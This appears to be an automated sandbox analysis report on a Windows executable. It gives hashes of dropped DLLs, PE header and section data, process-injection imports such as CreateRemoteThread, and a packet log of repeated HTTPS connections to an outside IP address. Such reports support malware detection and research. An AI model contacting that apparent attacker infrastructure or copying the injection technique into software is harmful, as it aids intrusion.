                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.542225503882471
                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                                                                                File size:402'432 bytes
                                                                                                                                                                                                                                                                                                MD5:b841d5f5e8102ee6ac56d565fbb58879
                                                                                                                                                                                                                                                                                                SHA1:972f4ba09920b0512769f9eb1923da2d8b0b9470
                                                                                                                                                                                                                                                                                                SHA256:e3d540df89c42080e0d44ae13d7687f5ec5dd178128cb9831eefddc742f2cf3e
                                                                                                                                                                                                                                                                                                SHA512:f565307a8bcc736c94e4eda451e58447839c3c142fd5601764f87f2b4d9734d11debd069d0822e66e2551c6c2d57f8c1123439c4dc2e7c7955b4f5248fb593de
                                                                                                                                                                                                                                                                                                SSDEEP:12288:j8DhiD2IN0wnmRsJlBza6WHAf1kNgggoCe:ehiqIN7wClMBAf+rhR
                                                                                                                                                                                                                                                                                                TLSH:1C84E015B1C08073E9A629320AF0DAB55F7DB8700BA5598F63985F7F4F306C1D722A6B
                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E\..+...+...+.B.(...+.B...;.+.B./...+.B.*...+...*...+.SN/...+.SN(...+.SN....+.bM"...+.bM)...+.Rich..+.........PE..L....x"f...
                                                                                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                                                Entrypoint:0x405f71
                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                Time Stamp:0x6622780C [Fri Apr 19 13:56:28 2024 UTC]
                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                Import Hash:f578d161341ba8161650c97fe866d0ab
                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                call 00007F56584CEACEh
                                                                                                                                                                                                                                                                                                jmp 00007F56584CE199h
                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                                                                                                                                                add ecx, eax
                                                                                                                                                                                                                                                                                                movzx eax, word ptr [ecx+14h]
                                                                                                                                                                                                                                                                                                lea edx, dword ptr [ecx+18h]
                                                                                                                                                                                                                                                                                                add edx, eax
                                                                                                                                                                                                                                                                                                movzx eax, word ptr [ecx+06h]
                                                                                                                                                                                                                                                                                                imul esi, eax, 28h
                                                                                                                                                                                                                                                                                                add esi, edx
                                                                                                                                                                                                                                                                                                cmp edx, esi
                                                                                                                                                                                                                                                                                                je 00007F56584CE33Bh
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                cmp ecx, dword ptr [edx+0Ch]
                                                                                                                                                                                                                                                                                                jc 00007F56584CE32Ch
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [edx+08h]
                                                                                                                                                                                                                                                                                                add eax, dword ptr [edx+0Ch]
                                                                                                                                                                                                                                                                                                cmp ecx, eax
                                                                                                                                                                                                                                                                                                jc 00007F56584CE32Eh
                                                                                                                                                                                                                                                                                                add edx, 28h
                                                                                                                                                                                                                                                                                                cmp edx, esi
                                                                                                                                                                                                                                                                                                jne 00007F56584CE30Ch
                                                                                                                                                                                                                                                                                                xor eax, eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2d5e8 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x64000 | 0x1ad0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2bbe0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2bb20 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x24000 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2141f | 0x21600 | e945d50a73d4289362b449353f7fc9ef | False | 0.5795148642322098 | data | 6.628835364496811 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.bss | 0x23000 | 0x3c2 | 0x400 | a39c4cbc1e6cde75e66e475335ee74a6 | False | 0.7509765625 | data | 6.256910555457959 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x24000 | 0x9d20 | 0x9e00 | 5ab05c2a1b147f43211292ffe3bb921c | False | 0.4361896756329114 | DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 8589934592.000000, slope 2418061182712720643850240.000000 | 4.977666460125074 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2e000 | 0x35830 | 0x34c00 | 533c8be845e2d9eca417fa3d5573824d | False | 0.9827828791469194 | DOS executable (block device driver \377\377\377\377,32-bit sector-support) | 7.981111508297588 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x64000 | 0x1ad0 | 0x1c00 | ce49e438edea1faeeeb6c0535955543b | False | 0.7296316964285714 | data | 6.377565996187367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

DLL | Import
KERNEL32.dll | WaitForSingleObjectEx, CloseHandle, FreeConsole, VirtualProtectEx, CreateRemoteThread, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.727022886 CEST44349730184.30.122.179192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.727113962 CEST49730443192.168.2.4184.30.122.179
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.727127075 CEST44349730184.30.122.179192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.727171898 CEST49730443192.168.2.4184.30.122.179
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.727224112 CEST44349730184.30.122.179192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.727279902 CEST49730443192.168.2.4184.30.122.179
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.814857960 CEST49730443192.168.2.4184.30.122.179
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.814879894 CEST44349730184.30.122.179192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.834521055 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.834583998 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.834727049 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.835269928 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:58.835285902 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:59.539818048 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:59.539941072 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:59.545289040 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:59.545300007 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:59.545698881 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:59.545772076 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:59.546386003 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:59.588165998 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.098916054 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.099050045 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.099071026 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.099124908 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.099276066 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.099329948 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.101825953 CEST49731443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.101845980 CEST4434973137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.104443073 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.104545116 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.104650974 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.104891062 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.104922056 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.538940907 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.539073944 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.539580107 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.539608955 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.542040110 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:00.542054892 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.361582994 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.361680031 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.361687899 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.361782074 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.373343945 CEST49732443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.373378992 CEST4434973237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.375507116 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.375586987 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.375662088 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.376069069 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.376089096 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.808238983 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.808448076 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.809048891 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.809062004 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.811367035 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:01.811373949 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.624212027 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.624238968 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.624304056 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.624315023 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.624341011 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.624360085 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.624651909 CEST49733443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.624671936 CEST4434973337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.626319885 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.626360893 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.626458883 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.626698017 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:02.626710892 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:03.059078932 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:03.059206009 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:03.059828997 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:03.059853077 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:03.061975956 CEST49734443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:03.061988115 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:03.875211000 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:03.875241041 CEST4434973437.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.802558899 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.802578926 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.802681923 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.802690029 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.802745104 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.823108912 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.823131084 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.823179007 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.823196888 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.823224068 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.823245049 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.845216990 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.845237017 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.845325947 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.845356941 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.845402956 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.863085985 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.863111019 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.863221884 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.863233089 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.863280058 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.883085966 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.883120060 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.883161068 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.883171082 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.883210897 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.883236885 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.899532080 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.899552107 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.899600983 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.899610996 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.899646997 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.899679899 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.917742014 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.917788029 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.917840958 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.917859077 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.917884111 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.917916059 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.932779074 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.932800055 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.932853937 CEST49736443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.932862043 CEST4434973637.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:08:06.932878017 CEST49736443192.168.2.437.27.87.155
